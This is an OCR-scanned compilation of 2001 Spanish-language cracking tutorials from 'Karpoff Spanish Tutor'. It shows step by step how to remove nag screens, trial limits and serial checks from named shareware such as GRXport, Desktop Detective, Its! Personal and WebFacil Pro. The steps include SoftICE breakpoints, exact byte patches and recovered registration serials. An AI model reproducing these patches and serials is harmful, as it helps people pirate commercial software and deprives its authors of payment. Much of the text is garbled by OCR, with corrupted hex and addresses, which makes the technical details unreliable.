mejoraré!! también se aceptan sugerencias y dudas.. lo que sea!! ah.. y otra cosa.. recuerda que ésto es un 
tutorial de un newbie “pa un newbie..!!! 


por hoy es todo.. nos vemos!! hasta siempre! ! 


si tienes alguna duda mándame un mail a smash gamehacks.net 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: GRXport v1.0 (build 200400) 
PROTECCION: Limitación de Tiempo (30 días) y de archivos a exportar. 
Objetivo: Quitar las 2 Nag's sCREENS y el limite de 20 archivos a exportar. 
E . Pequeña utilidad para generar archivos GRX (archivos de 
Descripcion: aid ; 
exportación para GetRight). 
Dificultad: Principiante. 
DOWNLOAD: http: //www.autoMATion-software.co.uk 
. file insPEctor, SoftICE y Editor Hexadecimal (yo usaré el Hexwork 
Herramientas: 
Shop v 3.01). 
CRACKER: Profesor X FECHA: 11/1/2001 


introduccion 


hola amigos espero que, vayan avanzando en este mundillo del cracking que es 


facinante y como dice el lema del grupo al cual pertenesco tnt crack team :: el conocimiento 
es nuestro poder !!, ahora en este tutorial analizaremos y aprenderemos como quitar molestas nags screen” s, las cuales nos 
recuerdan que no estamos registrados y que tenemos que pagar no se cuantos dolares para ser usuarios registrados, en uno de mis 
primeros tutoriales hable de como quitar las nags screens con ayuda del softice ejecutando el programa con el symbol loader, 
ahora ocuparemos otra forma diferente de borrar esas nag” s screen con unos breakpoints muy utiles que sirven para la mayoria de 


las nagís screens que son: Yetdialogindirectparama y enable window, para este programa de 
ejemplo el grxxport podremos usar cualquiera de los dos breakpoints, empezemos con 
este menjurgue .....m..... 


al atake 


comentario del programa 


e pequeña utilidad para generar archivos grx ( archivos de exportación para getright 
lo que nos interesa...el programa es shareware con libre uso de 30 días, y para registrarse hay que pagar $? us. 


pero tenemos a nuestro querido amigo.... softice...... jejeejejejejj!!!!! := 
objetivos 


1. quitar las dos molestas nag's screens 
2. quitar limite de 20 archivos a exportar en la opción : auto numbering form 


manos a la obra 


antes de abrir el programa lo analizamos con file inspector v4.0 el que nos mostrará información realmente importante 
a la hora de atacar el programa; bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en microsoft visual c++v 5.0 
e no está empacado 


a continuación...cerramosfile inspector v4.0y abrimosgrxport v1.0 (build 200400) y lo primero que aparece es una 
nag screen como esta: 


GRXport 
a product by autoMA Tion softwwe 
> Product information: — 
Versiont ; 10 
Buld : (200400) DEMO 
Relsase Dale . 20th Apel 2000 


Licence Information: 
This product iz a DEMO version 


You are entitled to use il for a trial period of 30-days only. Añtes 
which you MUST register or delete it. For detads on registering 
please vist the autoMA Tion software web page Ested below or 
consult the README.TXT file mchaded with this package. 


Coritact Information: 
Web Page Address : ww autoMA Tionsoftware.co. uk 
E-Mad Address: - autoMA Tion_sofwareGhotmadl com | 


7] 


damos click en el boton de ok y nos manda a otra ventana como esta: 


GRXport 
for Windows 95/98/NT/2000 


You are entitled t 


vá.0 


ais program for a trial period of 30 days only 


After v u must register it or delete it 


http: 42. autoMá Tion-software.co.uk 


y unos dos segundos despues se ejecuta el programa, el objetivo quitar esas dos molestas nag's screens y 


el limite de 20 archivos exportados. 


usando el softice primera nag 


screen 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...cargamos el softice y damos f5 y ponemos un break point bpx enablewindow , damos enter y despues 
f5 y ejecutamos el programa grxport , y saltamos rapidamente al softice damos f12 dos veces y aparecera la primera 
ventana, damos click en el boton ok de la primera ventana y saltamos otra vez al softice y damos f12 otra vez y 

apareceremos aqui: 


:004018a5 


:004018aa 


:004018ae 


:004018b3 


:004018b7 


:004018bc 


:004018bd 


:004018c4 


:004018c9 


:004018ca 


:004018cf 


:004018d2 


e8f£2160000 


8d4c2410 


e827180000 


8b4c2414 


bb02000000 


51 


889c2438050000 


e8a7100000 


56 


e8e1100000 


83c408 


8d8ea0010000 


call 00402f9c <-—llamada que genera la lra ventana 


lea ecx, dword ptr [esp+10]<-—caemos aqui 
call 004030da 
mov ecx, 


dword ptr [esp+14] 


mov ebx, 00000002 
push ecx 
mov byte ptr [esp+00000538], bl 
call 004029a0 


push esi 


call 004029b0 <-—- llamada que genera la 2da. 


add esp, 00000008 


lea ecx, dword ptr [esi+000001a0] 


como podemos ver caemos en el softice despues de dar el ultimo f12 una linea despues de la call que genera la ventana, 
bueno entonces lo que hay que hacer es anular esa llamada, como ????....jejje facil facil..... apuntamos la dirección de 
memoria en la cual se encuentra esa llamada y desensamblamos el ejecutable del grxport con el w32dasm y vamos a esa 
dirección de memoria y sacamos su offset, no les dire como sacar el offset por que si han leido todos mis tutoriales, he 


hexwork shop v 3.01, abrimos una copia del ejecutable en el editor hexadecimal y damos control g y aparecera una ventana 
en la cual insertaremos el offset obtenido, damos click en el boton llamado go y listo nos colocaremos en los bytes a 
cambiar que son 5 bytes e8 £2 16 00 00por 90 90 90 90 90 cambiemoslo y guardemos los cambios y ejecutemos el 


usando el softice segunda nag 
screen 


ahora vamos a quitar la segunda nag screen que aparece en el inicio del programa, ok!!! continuemos con este torito!!! 


memoria 004018caencontramos que ahi se genera la segunda nag screen, ok! entonces borremosla esa call, saquemos su 
offset que es:18ca y abrimos el editor hexadecimal y cambiamos e8e1100000 por 9090909090 y guardamos los 


usando el w32dasm limite de 
20 archivos de exportación 


ok!! ahora quitaremos el limite de 20 archivos de exportación. 


cuando queremos poner la cantidad de archivos a generar en la opcion de auto numbering form nos aparece esta 
messagebox 


MN You carmot use he DEMO version of GRXport to generate a hist of more than 20 files 


[cepa] 


aqui tendriamos dos formas de atacar esa messagebox: 
1. usar el softice poniendo un break point en messageboxa 
2. desensamblar el ejecutable para buscar el string que aparece en la messagebox 


estas son las dos formas que se me ocurren usar, pero como me dijo un amigo, siempre busca la forma mas facil de 
hacer las cosas, ok!!!!, entonces vamos y abrimos el w32dasm y desensamblamos el ejecutable del grxport, una vez 
desensamblado vamos a el icono de string references y damos click en el y aparecera una ventana en la cual apareceran 
todos los strings que existen en el ejecutable una vez ahi buscamos , buscamos y buscamos y por fin casi a lo ultimo 
encontramos la string reference que dice'' you cannot use this demo version''damos doble clik sobre el y nos manda a 
la parte del codigo que hace referencia : 


* referenced by a (u)nconditional or (c)onditional jump at address: 

1:00401f51(c)| 

:00401f66 2bc1 sub eax, ecx 

:00401f68 83f814 cmp eax, 00000014 <---- comparacion del numero introducido con 14 hex 
:00401f6b 7e13 jle 00401180 <---salto sospechoso :)d 

:00401f6d 6a00 push 00000000 


:00401f6f 6400 push 00000000 


* possible stringdata ref from data obj->'"you cannot use the demo version 
->"of grxport to generate a list of more than 20 files" 

00401171 6804614000 push 00406104<-- caemos aqui 

* reference to: mfc42.ordinal:04b0, ord:04b0h 

:00401f76 e8ad110000 call 00403128 

:00401f7b e904030000 jmp 00402284 

* referenced by a (u)nconditional or (c)onditional jump at address: 

¡RO0401Í6D(C)...ooocoooccncncncono no. 

como podemos ver unas lineas mas arriba hay un salto sospechoso : 


:00401f68 83£f814 cmp eax, 00000014 <---- comparacion del numero introducido con 14 en hexadecimal que es 20 
en decimal. 


:00401f6b 7e13 jle 00401180 <---salto sospechoso :)d 

despues de la comparación viene un salto ¡le que significa "jump if less or equal" ''salta si es menor o igual" ok 
creo que lo tenemos, ahora solo tenenemos que cambiar ese salto por un salto incondicional que seria jmp para 
que salte no importando el valor que tenga, ok para eso vamos y apuntamos su offset que es: 1f6b ok ahora 
abrimos el ejecutable del grxport en el editor hexadecimal y damos contro g y ponemos ahi el offset y damos ok y 
saltamos directamente a la parte donde cambiaremos: 

00002bc183f8147e136400620068 

por 


00002bc183f814eb1362006a40068 


guardamos los cambios y ejecutamos el programa y ninguna nag screen y ponemos mas de 20 archvios damos 


nota 


soy humano y cometo errores, si encuentras uno házmelo saber ok. profesor_x 


saludos 


e [dek_oin ] 
e txeli 

e Kuato_thor 
e Crkviz 


e code_mex 


e metamorfer 
e txotxo 
e raziel 
e turbop 


e karpoff http:/ /welcome.to/ karpoff 


e xasx de tnt! http://www.tntcrackers. ws 


e Viper ( creador de file inspector ) file inspector web site http:// www.finspec. swsites. net/ index. htm 


e toda la people de tutoriales2000. 


e saludos a todos los crackers del mundo. 


chao!! 


espero que hayan disfrutado leyendo este tutorial y que les sirva para incrementar sus habilidades, pero recuerden, lean 
muchos tutoriales, practiquen, estudien y crackear será mucho más fácil. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Desktop Detective v2.1 

PROTECCION: Serial 

Objetivo: Encontrar un numero de serie 

Descripcion: 

Dificultad: Novato 

DOWNLOAD: http://www.bitlogic.co.uk 

Herramientas: Softice 

CRACKER: Pedrolas FECHA: 11/01/2001 
introduccion 


desktop detective v2.1 es un programa que realiza un seguimiento de todo lo que 
hacemos en nuestro ordenador, presentandolo en informe y graficos. 
este programa trabaja en background y se desactiva mediante password. 
controla las pulsaciones de teclado, las entradas a internet, etc... o sea que es como un 
detective. 


al atake 


nada mas entrar descubrimos que no aparece un ventana con dos opciones: "licence key" y 
"online order”. pulsamos en "license key" y nos aparece una ventanita donde tenemos que 
poner nuestro numero de registro. 


The Dosktop Debectiv 


0 Deskiondetective 37 


Surviellance System 


Welcome Operator You have used 1 out of 15 Tra Operations 


Application Information bicence Information 


Pe 


Credits Y Ackmowledgements to Software Support E Updates 


Support: software AS bitlogk,c ok 


Enquiries: info'4bRbogr.co.uk 


WebSite: hitos! /werwbitdogk.c ok 


Authonze Licence 
Enter the Licence Key sent with you Order. 


[123456789] 


ahora le damos a "authorize" y como es obvio nos dirá que este numero no sirve y nos saldrá 
una ventana como esta: 


Authorze Licence 


Í NYALID LICENCE KEY 


volvemos a poner nuestro numero de registro falso, pero antes vamos al softice y colocamos 
un 


bpx hmemcpy 

pulsamos enter y f5. 

entonces saltara el sotfice, pulsamos f11 y luego f12 hasta que aparezca la siguiente linea 
00 4dc8ac mov eax,[ebp-0c] 


pulsamos f10 hasta 


mov edx,004dafec d eax y sale el numero falso 

seguimos dando a f10 hasta llegar a la siguiente call 

004dc8b4 call 00404038 

entramos en la call pulsando f8 y le damos 5 veces a £10 hasta ña suiguiente linea 
0040403f cmp eax,edx 

hacemos un d edx y saldrá nuestro numero de registro. 

en mi caso es el: 171200200101 


metemos este numero y el programa nos lo agradecerá con la siguiente ventana: 


Information E 


' A Thankyou for Ordenng and Supporting this Software. 
> Your Licence entilles you to Free Updates and Support 


This Software will now be Activated. Thankyou. 


enhorabuena, ya has conseguido registrar el programa. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Its! Personal v2.9%gy 

PROTECCION: Serial 

Objetivo: Encontrar un numero de serie 

Descripcion: 

Dificultad: Novato 

DOWNLOAD : http: //www.rkssoftware.com 

Herramientas: Softice 

CRACKER: Pedrolas FECHA: 12/01/2001 
introduccion 


1ts! personal v2.9g es un completo diario para nuestro ordenador. ya lo dice en la 
ayuda: 

- attractive, intuitive interface 

- unlimited number of days 

- optional password protection - completely secure 

- WYSIWYyg - use any windows fonts available 

- insert graphics and icons 

- print single pages, separate pages, or merged pages to save paper 
- export to rich text format 

- search and replace 

- Spell checking 

- search all entries for specific text 


al atake 


nada mas entrar descubrimos que no aparece un ventana con un boton que dice register, le 
damos y nos aparece una ventana como esta. 


ponemos nuestro numero de registro falso. 


ahora le damos a "ok" y como es obvio nos dirá que este numero no sirve y nos saldrá una 
ventana como esta: 


You haya entered an Incorrectname and/or serial number Please checkihe following: 


volvemos a poner nuestro numero de registro falso, pero antes vamos al softice y colocamos 
un 


bpx hmemcpy 
pulsamos enter y f5. 


entonces saltara el sotfice, pulsamos f11 y luego f12 hasta que aparezca la siguiente linea 


0048eefe 
0048ef01 
0048ef07 
0048ef0a 
0048ef0d 
0048ef12 


mov eax,[ebp-0c] 

mov ecx,[eax+000001d0] 

mov edx,[ebp-08] 

mov eax,[ebp-04] 

call 00495294 

testal,jal <---dedx nos sale rks-2677086 
<--- d nos sale rks-2728256 


en mi caso es el: rks-2677086 y rks-2728256 


o sea que nos salen dos numeros de registro. 


metemos uno cualquiera de los numeros y el programa nos lo agradecerá con la siguiente 


ventana: 


ltsPersonal 


ML) Señal Number Accepted. 


enhorabuena, ya has conseguido registrar el programa. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Para todos los escritos en VB5 

PROTECCION: Serial único, Serial por nombre. 

Objetivo: 

Descripcion: Análisis de la MSVBVM50.DLL 

Dificultad: Fácil/Intermedia/Difícil 

DOWNLOAD : http://... 

Herramientas: Softice, W32Dasm89 

CRACKER: iDznaK FECHA: O A 
introduccion 


bueno este ensayo esta dedicado a todos los crackers que han tenido la amabilidad de hacer un 
tutorial y ponerlo a disposicion de la gente, y dedicado a karpoff y su grandiosa pajina gue. 


salu!, aqui esta mi ensayo sobre visual basic 5, por supuesto que esto es muy experimental aun me 
falta seguir estudiandolo. un buen metodo para entender a estos programas hechos en vb5 es fabricar 
un propio crackme, de esta manera sabremos por donde va cuando nuestro serial es el correcto y que 
es lo que no hace cuando es falso. este tutorial viene con unos crackmes que yo hice por supuesto 
todo esto con sus respectivas soluciones. 


no quiero saltarme ningun proceso de los cuales hice para llegar a entender algo de la dll msvbvm50 
de vb5 y algo de los ejecutables, aunque si lo hare resumido pero entendible. 


nota: se necesitan de conocimientos basicos sobre el uso de softice, pero tratare de detallar todo lo 
aqui expuesto. 


al atake 


ensayo 1 sobre vb5 


por idznak 


la logica de la libreria msvbvm50.dll 


un poco de teoria 


lo primero que hice antes de tirarme al terreno y comenzar a pelear contra este "lenguaje" fue preguntarme que es 
basicamente un ejecutable en vb y como trabaja, despues de definir hacia donde tenia que apuntar me decidi a crear 
un crackme, trate que no sea algo tan simple pero tampoco me resulto algo extraordinario, no porque no quisiera 
hacerlo sino porque al parecer sangre de programador tengo muy poca. 


me decidi a desensamblar el crackme y me doy cuenta que un ejecutable en vb son llamadas sobre llamadas a esta 
msvbvm50.dll (esto lo sabia hace tiempo pero hasta ahora no me decidia a estudiarlas, pues conocimientos de 
assembly no tenia, ahora almenos entiendo algo) , entonces teniendo este valioso dato me puse a pensar... "si estos 
ejecutables dependen tanto de esta libreria (dll) esque todos deben de tener algo en comun, algo asi como una 
llamada unica para la comprobacion o bien una llamada unica desde la libreria msvbm50 para volver al ejecutable", 
para esto no me sirve smartcheck, asi que acudire a mi gran amigo softice, aunque en un ejercicio quizas 
ocuparemos al smartcheck. 


corro el loader y cargo el crackme, cuando apareci dentro del softice y dentro del codigo del crackme solo vi puros 
"invalid", pero eso se remedia con un f10 (avanzar), luego de esto me di cuenta de lo siguiente (esta es una imagen 
un crackme desensamblado con w32dasmg89, en todo caso esto es comun en todos los ejecutables hechos en vbb, 
me refiero a la estructura del punto de entrada) 


* Reference To: MSVBVMSO. ThunBTMain, Ord: 0064h 


| 
:O040114E FF25AC514000 Jmp dword ptr [0040514C] 


:004011B4 6848124000 push 00401248 


* Reference To: MSVBVYM50. ThanPTMain, Ord: 0064h 

| 
:004011B9 ESFOFFFFFF Call OO40OLLARE 
:004011BE 000000000000 BYTE $ DUP(0) 


cuando estamos en el softice (luego de apretar f10) llegamos a :004011b4 , si seguimos trazando llegamos a 
:004011b9 y apretando f8 esta call nos envia a :004011ae,si en esta direccion apretamos f10 saltamos a [004051ac], 
¿que siginifica esto? pues esto es una direccion de memoria (si me equivoco en la explicacion haganmelo saber) 
cuando el programa llega hasta aca pasa el control a la libreria msvbm50, esto es asi en todos. para entender bien el 
punto de entrada observar la imagen. 


bueno si comenzamos a trazar hasta nuevamente retornar al codigo del programa nos demoraremos mucho... ya lo 
hice, algo masmenos largo y tedioso, pues muchas veces tuve que volver a comenzar pues me pasaba, pero al fin lo 
encontre. 


este punto que a continuacion explico es el producto de muchos traceos y minutos, mas bien horas, pero aqui esta 
para todos. 


en 0f01e57e se ubica una call 0f01e589 si entramos a esta con f8 y trazamos con f10, llegaremos al punto que nos 
interesa. 


algo para tener encuenta: 


todos los programas en vb5 tienen un offset que comienzan con 40xxxxxx y los de msvbm50 comienzan con 


00000. 


el punto que nos interesa: 0f01e5a7 donde hay un call eax (observar el valor de eax). todo esto dentro de msvbmb50. 


si entramos a esta llamada (f8) en esta direccion siempre nos llevara al codigo del ejecutable "la victima", al sitio 
donde se llevan a cabo las "transacciones" y dentro de ese codigo en algun lugar se comprueba nuestra clave con la 
verdadera, siempre dentro de esta call estaran los saltos a "error" o "gracias". 


tambien si ponemos un bpx en la direccion 0f01e5a7 y cargamos un ejecutable de vb5 quebraremos cuando 
comienze a leer los datos de registro. 


cuando nuestra clave es comprobada, o el calculo que sea es finalizado y comprobado, ya sea verdadero o falso, 
retornaremos a la libreria msvbm50, llegando a esto ya no nos sirve (almenos en este ensayo), tenderemos que 
comenzar nuevamente, pero para los programas compilados en p-code entraremos al codigo del programa y 
saldremos casi inmediatamente para volver a la libreria si es que seguimos trazando, bueno he estudiado un 
programa en p-code (webfacil pro) y lo crackie, asi que despues de todo esto pasaremos a ese pequeño ensayo 
sobre el p-code. 


por lo general la clave verdadera aparece despues de un lea ecx,[ la operacion que seal. antes de llegar a esto siempre 
pasamos por muchos mov (en algunas ocaciones), tambien debemos estar atentos a cuando aparezca algo semejante a esto 
mov dworptr [lo que sea], 004xxxxx (cualquier direccion que empiece por 4). 


debemos de estar atentos al valor que toman lor registros eax , ecx y edx (almenos estos son los que e visto y comprobado) 

en eax casi siempre va la clave falsa y en ecx la verdadera, cuando estos tomen un valor que comience con 4xxxxx debemos 
de escribir d eax o d ecx y presionar enter, pues es probable que ally este nuestra clave verdadera, y cuando veamos un mov 
dworptr [lo que sea], 004xxxxx, escribimos d 4xxxxx. tambien debemos estar atentos a valores extraños o sospechosos que 

arroje el registro ecx o edx. 


un ejemplo ficticio: 


supongamos que luego de pasar todos esos mov y despues de unos cuantos f10 mas,el registro ecx adquiere el valor de 
40441288, entonces escribimos d ecx y en la parte superior de la pantalla, bajo los registros, aparecera esto : 


(nota un ejemplo, nada real, ni siquiera los hexas) 
byte prot (1) 
xxxx:40441288 33 00 88 00 cocoociocicionocos MAS DylOS..occcacacianocnanoncanoncana 1.7.c.8.4.e.b. 


lo mas seguro es que si te aparece algo asi (lo que esta en verde), es que esta sea la clave verdadera, pero no 
olvidarse de seguir mirando hacia abajo, puede que continue. 


no en todos los casos se da esta facilidad, algunas veces este caso de que el registro ecx o eax marquen 4xxxxxx y 
que apunte a un serial real no sucede, especialmente cuando el tipo de comprobacion es mas menos facil (una 
multiplicacion) desde el punto de vista que lo vieramos descompilado o source code (aunque paresca extraño). pero 
como dije, esto es un ensayo que nos sirve para aproximarnos un poco mas, quizas buscar este tipo de 
comprobacion en algun programa puede fallar, se nos puede hacer mas dificil, pero eso si, poner un bpx en la 
direccion 0f01e5a7 nunca falla, y entrando a este punto estamos en todo el codigo de generacion y comprobacion, 
con lo cual podemos detectar el lugar que nos da el error y si se nos complica la cosa de obtener un serial valido 
podemos recurrir al listado muerto, o sea, a desensamblar o bien si se prefiere dedica un poco mas de tiempo mas al 
listado generado por softice y comprender el proceso de comprobacion, en todo caso si nos pasamos nos aparecera 
la pantalla de error. 


bueno para entender mejor no hay nada superior a los ejercicios, crackearnos nosotros mismos para despues 
crackear a los que programan por dinero, y estoy muy seguro de que 99 de 100 hacen protecciones peores a las 
nuestras, digo comparandonos con esos monigotes. 


bien como dije al principio, hice unos crackmes, ahora practicaremos con ellos, ira de un nivel facil a uno no tan 
facil, parcharemos y tambien encontraremos un serial valido, y trabajaremos con smartcheck para solucionar una 


parte de un crackme. 
estan linkados, para que no se demore la carga de las paginas. 
p.d en los ejercicios si tengo que referirme a la dll de vb5 la llamare libreria. 


en cada ejercicio quizas encuentre cosas nuevas , pues como dije esto es un ensayo y voy experimentando y 
aprendiendo con cada codigo que paso. 


todos con su tutorial y ordenados por tipo. 


ejercicio 1 ejercicio 2 ensayo 1 p-code 
serial unico serial por nombre webfacil pro 


estudiando a vb5 parte ii - ejercicio 1 


bien, hora de entrar al terreno. 


creo que ya le ha dado un vistazo al ejercicio +41, no pide nombre solo un serial.primero parchemos luego vamos en 
busca de el, he escrito dos soluciones, pero existen otras. 


corremos al softice, luego ejecutamos el loader y cargamos al ejercicio +41, ahora debemos pulsr f10, luego f8, y 
luego f10, cuando estemos en la libreria debemos poner un bpx en la direccion "magica", esta 0f01e5a7, pues este 
es el lugar donde la libreria le devuelve el control al ejecutable para que realice sus operaciones. 


pulsamos f5 hasta que aparezcamos nuevamente en el ejercicio ¿41 (fuera del softice), procedemos a ingresar un 
serial cualquiera y apretamos ok. inmediatamente quebraremos en el lugar donde hemos puesto nuestro bpx, 
cuando estemos alli pulsamos f8 para poder entrar a call eax y comenzamos a trazar con f10, (si gusta tracee 
tranquilo observando los registros y los mov quizas encuentre otras cosas), llegaremos a un lugar donde esta 
ubicadas muchas intrucciones como esta mov [ebp-24], edi, estas intrucciones llegan hasta el offset 004060d5 
(estan todas juntas). 


cuando llegemos a offset 00406118 estar atentos. ( ahora explico que nos encontramos aqui). 


axxx:00406118 8b4db8 mov ecx,[ebp-48] 
pooo::0040611b 51 push ecx 
mov destino,fuente "mueve los datos de fuente hacia destino" 


¡push fuente "guarda la fuente, o sea el valor que la fuente tiene en ese momento" 


continuemos. cuando llegemos a push ecx mirar valor que este tiene, pues si lo buscamos como direccion (d ecx) 
encontraremos el numero que nosotros ingresamos, si encontramos esto es porque ya estamos cerca, asi que ojos 
bien abiertos. 


ya en offset 40612a esta algo que nos interesa. 
xxxx:0040612a (hexa) test ah,40 


xxxx:0040612d 7407 jz 00406136 (si nuestro numero es erroneo salta) 


este testeo es caracteristico para comprobaciones con un numero fijo, algo asi como. 

ifa=7*54 then (esto vendria siendo test ah,40) esto es un ejemplo pues el serial valido no es el producto de 7*54. 
codigo para mostrar el mensage de estamos bien o el codigo para escribir en el registro o donde sea. 

goto salimos: 

else (si es erroneo estamos aqui) 

end if 

salimos 


entonces como primera solucion se podria parchear este salto, como hacemos para que no salte?, pues lo 
nopeamos, o sea cambiamos el 7407 por 9090. 


la seguna solucion, que es la mejor: 


seguimos estando aqui xxxx:0040612d 7407 ¡z 00406136, hechemos un vistazo al codigo que esta un poco mas 
abajo (sin f10) y encontramos que en offset: 


xxxx:0040615b c7458c54430000 mov dword ptr [ebp-74], 00004354 
escribamos 24354 y presionemos enter, entonces nos aparecera 


00004354 000017236 "ct", no tomemos encuenta a "ct". bien ese 17236 es el numero de serie valido. te daras 
cuenta que lo es si haces la primera solucion y luego buscas con el explorador de windows el fichero registrao.crk, 
miralo dentro y encontraras este numero. 


bueno creo que ya tienes una idea de que es lo que hace el programa cuando tu haces la primera solucion, para que 
no queden dudas explico. 


explicacion del codigo: 
xxxx:0040612a (hexa) test ah,40 
xxxx:0040612d 7407 jz 00406136 (si nuestro numero es erroneo salta, vendria a ser else) 


este testeo es caracteristico para comprobaciones con un numero fijo, algo asi como. 


lifa =7*54 then (esto vendria siendo test ah,40) esto es un ejemplo pues el serial valido no es el producto de 754. 
[aqui tendria que ir el codigo para crear el fichero registrao.crk. 

¡cuando parchamos pasamos directamente a la cracion de este fichero y a la escritura sobre este mismo. 

¡goto salimos: 

¡else (si es erroneo estamos aqui) 


¡end if 


:salimos 


de hecho el ejercicio 41 checkea si existe este fichero y verifica si lo que esta escrto dentro de el es correcto, si no 
es asi te seguira pidiendo que ingreses el numero. 


estudiando a vb5 parte ¡ii - ejercicio 2 


salu!. aqui estoy tratando de hacer bien este tuto, y verdad que cuesta un monton redactar algo para que pueda ser 
entendido no tan solo por uno mismo. 


bueno corremos el ejercicio 2 escribimos el nombre y el numero un nro serie cualquiera, entramos al softice y 
ponemos bpx hmemcpy , salimos al ejercicio y pulsamos aceptar. cuando quebramos presionamos f11, escribimos 
bc* para borrar cualquier bpx existente y pulsamos f10 hasta llegar al codigo de la libreria, ponemos el bpx 
"magico", o sea, bpx 0f01e5a7, enter y presionamos f5, quebramos y presionamos f8 para entrar al call eax y 
comenzamos a trazar con f10, estemos atentos al registro ecx y edx. 


ya a la altura de 4029af, si hacemos d ecx podremos ver nuestro nombre, asi que ya debemos estar cerca de la 
generacion del numero de serie verdadero o de la comprobacion. 


ya a la altura de 402b45 observemos el valor de edx, parece algo sospechoso pues no se parece a los valores que 
que siempre se ven (0f01xxxx estos generalmente se refieren a la libreria, pero en edx no tendria porque ya que se 
ocupa eax para referirse a la libreria), veamos que numero da edx, hagamos ?edx y aparecera un numero, 
anotemoslo (lo que esta en "" no sirve para este caso". 


bueno sigamos mas abajo en la altura de 402ce4 mov[ebp-04]-edi, el registro ecx se ve sospechoso o mas bien 
parecido a algo que vimos anteriormente, veamos que numero nos da.?ecx y... se parece al numero que anotaste 
recientemente, es el mismo. salgamos de softice e ingresemos ese numerillo y... eureka. 


este ejercicio solo sirve para corroborar que los numeros verdaderos se guardan en los registros ecx o edx ademas 
de aparecer casi siempre despues de algun mov mas menos sospechoso o bien aislado. 


algo para tener en cuenta en este ejercicio: 


en offset 402a98 ver el valor de edx, suma edx a edx o sea ?edx+edx y te da el mismo valor obtenido recientemente, 
O sea que ya en essa parte el calculo ya fue efectuado en su totalidad. 


estudiando a vb5 parte iv - p-code ensayo 1 


para estudiar este tipo de compilacion se dio el caso de que hace ya bastante tiempo le tenia el ojo echado al 
webfacil pro asi que con este programa intente crackear mi primer p-code con las bases anteriormente explicadas en 
las otras partes de este tutorial. 


lantes de que sigas adelante lee esto: 


lo que vamos ha hacer ahora es estudiar este tipo de compilacion y actualmente utilizada como proteccion en un 
¡programa shareware que porsupuesto tiene su valor monetario, asi que todo lo que vas a leer es solo con fines 


¡educativos y no para joder al programador de esta herramienta para novatos en la confeccion de paginas guebs, 
¡por eso si el programa te gusto y decides pagar lo que pide el programador (que es bastante poco) deberias de 


hacerlo ya que se lo merece. el programa se descarga desde http://www.webfacil.com 


bueno, ya se sabe lo que se debehacer previamente, el bpx "magico" luego f8 y estamos en el codigo del programa. 


ya sabemos que esta en p-code ahora solo debemos analizar que hace el programa para mostrarnos las pantallas de 
registrate y estas caducao cabrito!. pues el que yo tengo lo caduque. 


aparecemos aqui antes de que aparezca la pantallita y sus botones. 


xx00o:0040adb0 b84c000000 mov eax,0000004c 
XXX OOOO XXXX cmp ax, c033 
xxxx:0040abd9 baa4fb4600 mov edx, 0046fba4 
POO0OEICOOOAKKKAX XXXX push 00401162 


XXOOCIOOOOAX 03 ret 


pulsamos f5 y aparecemos en la pantalla, la mision es aparecer directamente dentro del programa sin importar que 
estemos caducados o no registrados. pulsamos aceptar, quebramos pulsamos f8 y aparecemos en. 


xxxx:0040ad60 b854000000 mov eax,00000054 


si nos fijamos bien el lugar donde estamos se parece bastante al lugar que aparecemos cuando iniciamos el 
webfacil pro. 


entonces que hacemos?, probemos que pasa si cambiamos algunos bits en la segunda instruccion mov en el lugar 
donde aparecemos cuando ejecutamos el webfacil (arriba esta en celeste). 


salgamos del webfacil pro y corramoslo nuevamente f8 y busquemos offset 0040ada5 anotemos su codigo hexa, 
ahora cambiemos el baa4fb4600 que esta en xxxx:0040abd9 por el codigo hexa que anotamos recientemente. 


pulsamos f5 hasta salir de softice y aparecera la pantalla del explorador y luego la pantalla de webfacil pro pero sin 
dias de evaluacion, pulsemos aceptar, vamos a quebrar asi que ahora pongamos bd* para que el brackpoint quede 
diseable. y pulsamos f5, ahora aparecimos dentro de webfacil pro y lo podemos utilizar, esto es bueno pero 
evitemos esa pantalla. 


hacemos todo nuevamente 


ponemos be* para que el breack point quede activo, pulsamos control+ d y corremos el webfacil pro, hacemos los 
mismos cambios anteriores y cuando llegemos a la pantalla pulsamos aceptar entonces quebraremos pulsamos f8 y 
anotamos el codigo hexa de la segunda instruccion mov (la que esta antes del ret) 


una vez anotados escribimos exit en el softice y pulsamos enter, saldremos y aparecera la pantalla de que webfacil 
ha ejecutado una opracion no valida, pulsamos cerrar y corremos nuevamente webfacil pro, quebramos pulsamos f8 
y cambiamos el baa4fb4600 que esta en xxxx:0040abd9 por ba1ce04500 escribimos bd* enter y f5, y... perfecto 
estamos dentro de webfacilpro sin pasar por ninguna pantalla previa que nos diga que nos registremos. 


ahora solo debe efectuar los cambios con un editor hexa y el programa quedara sin limitaciones. 


no creo que sea necesario hacer aclaraciones sobre el cambio que hemos hecho, pero si tiene dudas escribame al 
email. 


por ahora este primer ensayo esta concluido, pero si ud desea aportar o mejorar esto porfavor hagalo que nos 
servira a todos. 


seguire estudiando a este visual basic y su libreria para poder hacer un segundo ensayo mas contundente, si ud 
¡quiere ayudarme pues venga hermano. 


¡ojala que les haya servido este ensayo... salu! 


idznakOc4.com 


el cracker jamas se vende, su trabajo tampoco. 


estudiando a vb5 parte ¡i "la teoria" 


si puedes ayudar a perfeccionar este ensayo, no esperes mas y destripemos a la libreria, si este ensayo te ayuda a 
perfeccionarte sere el mas contento. 


todos los derechos son de todos (n)o hay copy right 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


Karpoff Spanish Tutor 2001 


Offline Explorer 1.2 


PROTECCION: Name / Serial 

Objetivo: Encontrar un numero de serie valido 

E 
Dificultad: Novato 

DOWNLOAD: http: //www.metaproducts.com 

Herramientas: Softice 

CRACKER: Cbto FECHA: 15/01/2001 


introduccion 


